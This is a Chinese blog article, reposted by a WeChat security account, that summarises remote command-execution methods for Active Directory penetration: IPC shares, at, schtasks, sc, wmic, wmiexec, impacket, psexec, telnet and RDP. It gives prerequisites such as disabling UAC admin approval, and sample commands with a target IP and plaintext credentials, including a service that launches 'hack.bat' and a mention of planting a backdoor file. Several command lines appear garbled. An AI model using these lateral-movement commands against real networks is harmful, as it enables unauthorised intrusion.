前言
AD的全称是Active Directory:活动目录
域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。
在域渗透场景中,我们已经进入内网,会遇到大量的开放端口和服务,弱密码空密码,这个时候我们可以使用它们已经开启的服务选择对应的方式进行命令执行。本文对ad域渗透中常见的命令执行方式进行一个总结。
ipc
前提
开启ipc共享
配置本地安全策略:开始->运行-> secpol.msc->本地策略->安全选项->网络访问:共享>和本地帐户的安全模型>经典-本地用户进行身份验证
配置本地组策略:运行gpedit.msc ——计算机配置——Windows设置——安全设置——本地策略
——安全选项——用户账户控制:以管理员批准模式运行所有管理员——禁用。
文件共享
1
|
写入后门文件
|
后续使用下面的方式执行
at(win10不可用)
定时任务执行命令
前提
开启windows Event log服务,开启Task Scheduler服务
其余条件同ipc
命令执行
1
|
at \170.170.64.19 23:00 c:windowssystem32calc.exe
|
schtasks
前提
开启windows Event log服务,开启Task Scheduler服务
其余条件同ipc
1
|
schtasks /create /tn firstTask /tr "c:windowssystem32cmd.exe /c calc" /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwd
|
telnet
前提
开启telnet服务
命令执行
1
|
telnet 目标ip
|
sc
1
|
windows2003
|
命令执行
1
|
sc \170.170.64.19 create testSC binPath= "cmd.exe /c start c:windowshack.bat"
|
wmic
前提
开启wmi服务,135端口
命令执行
1
|
wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c calc.exe"
|
wmiexec.vbs(需要安装)
前提
开启wmi服务,135端口
安装
下载vmiexec.vbs
命令执行
1
|
cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwd
|
impackets wmiexec(需要安装)
前提
开启wmi服务,135端口
安装
1
|
git clone https://github.com/SecureAuthCorp/impacket/
|
命令执行
1
|
#获取远程计算机交互式shell
|
psexec(需要安装)
前提
开启admin$共享
安装
在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 下载安装
命令执行
1
|
#打开交互式shell
|
远程桌面
前提
开启远程桌面,3389端口
命令执行
可直接通过mstsc进入目标系统。
作者:Leticia,文章来源:Leticia's Blog
扫描关注乌云安全
觉得不错点个“赞”、“在看”哦
本文始发于微信公众号(乌雲安全):内网渗透之域渗透命令执行总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论